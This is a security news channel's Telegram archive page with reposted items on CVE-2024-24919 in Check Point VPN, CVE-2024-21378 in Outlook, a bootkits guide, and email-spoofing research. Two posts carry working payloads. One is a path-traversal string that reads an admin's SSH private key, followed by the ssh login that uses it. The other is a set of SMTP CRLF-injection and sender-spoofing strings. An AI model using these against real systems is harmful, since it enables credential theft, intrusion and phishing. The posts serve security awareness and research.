Fsecurity | HH
Kanalga Telegram’da o‘tish
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Ko'proq ko'rsatish2 008
Obunachilar
-224 soatlar
Ma'lumot yo'q7 kunlar
-1230 kunlar
Postlar arxiv
2 008
Repost from Ralf Hacker Channel
CVE-2024-24919: Check Point arbitrary file read (as root)
Blog: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
#cve #pentest #redteam
2 008
Repost from Kali Linux
+2
💻 Windows Bootkits Guide от ИБ-специалиста Артема Баранова
Руководство по буткитам Windows, которые начинают работать ещё до загрузки ОС, что позволяет им отслеживать, изменять процесс загрузки, а также бесшумно внедрять руткиты уровня ядра.
Гайд содержит 2 основных раздела: сборник источников с основными отчетами и докладами по буткитам и сводную инфографику.
🗄 Руководство
🗄 Подробнее о буткитах
@linuxkalii
2 008
Repost from Proxy Bar
CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa
*
ssh admin@Хостъ -i id_rsa
#shitPointVPN #0Day2 008
Repost from purple shift
Уязвимость CVE-2024-21378 позволяет выполнить произвольный код в системе, где установлен MS Outlook. А всё потому, что Exchange и Outlook, общаясь по протоколу MAPI, могут пересылать друг другу всякое разное и вообще немыслимое.
Например, можно создать собственный тип сообщения и указать клиенту Outlook, что для отрисовки этого сообщения следует использовать некую особую форму. И эту форму тоже можно передать адресату: такому сообщению соответствует класс
IPM.Microsoft.FolderDesign.FormsDescription. А сама форма представляет собой DLL-библиотеку, которая хранится как вложение в сообщении.
Чтобы эксплуатировать уязвимость, злоумышленник отправляет жертве форму, которая открывает определённый класс сообщений. А затем отправляет письмо-триггер, принадлежащее к этому классу сообщений. В результате Outlook загружает вредоносную форму (см. скриншот).
Наш эксперт Александр Родченко проанализировал процесс эксплуатации этой уязвимости и написал утилиту, которая сканирует скрытые сообщения и выявляет попытки атаки. Подробности – по ссылке.2 008
Repost from HaHacking
❔ #заметки #offense
➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!
🧩 ‟Old new email attacks” [ 🐍 / 💻 / 💻 ] ⚡️
📌 ГЛАВНЫЕ ПОИНТЫ
▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail: smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...
SSL port: 465
TLS port: 587
▪️Пробуйте разные входные точки:
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL
▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...
▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
▪️Python [email]
▪️JS [addressparser, email-addresses]
▪️C# [System.Net.Mail]
▪️Go [net/mail]
▪️Rust, Ruby, PHP, ...
🔑 ПЕЙЛОАДЫ НА ПРОБУ
...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]
📧➡️📧
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com
📧➡️📧, 📧, ...
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>
📧➡️📧, 📧
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>
📧➡️...
": <attacker@gmail.com> "<spoofed@gmail.com>"
☠️ ИМПАКТ & ПОСЛЕДСТВИЯ
▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация
❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок; ➡️Stay safe. @HaHacking 🐇
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
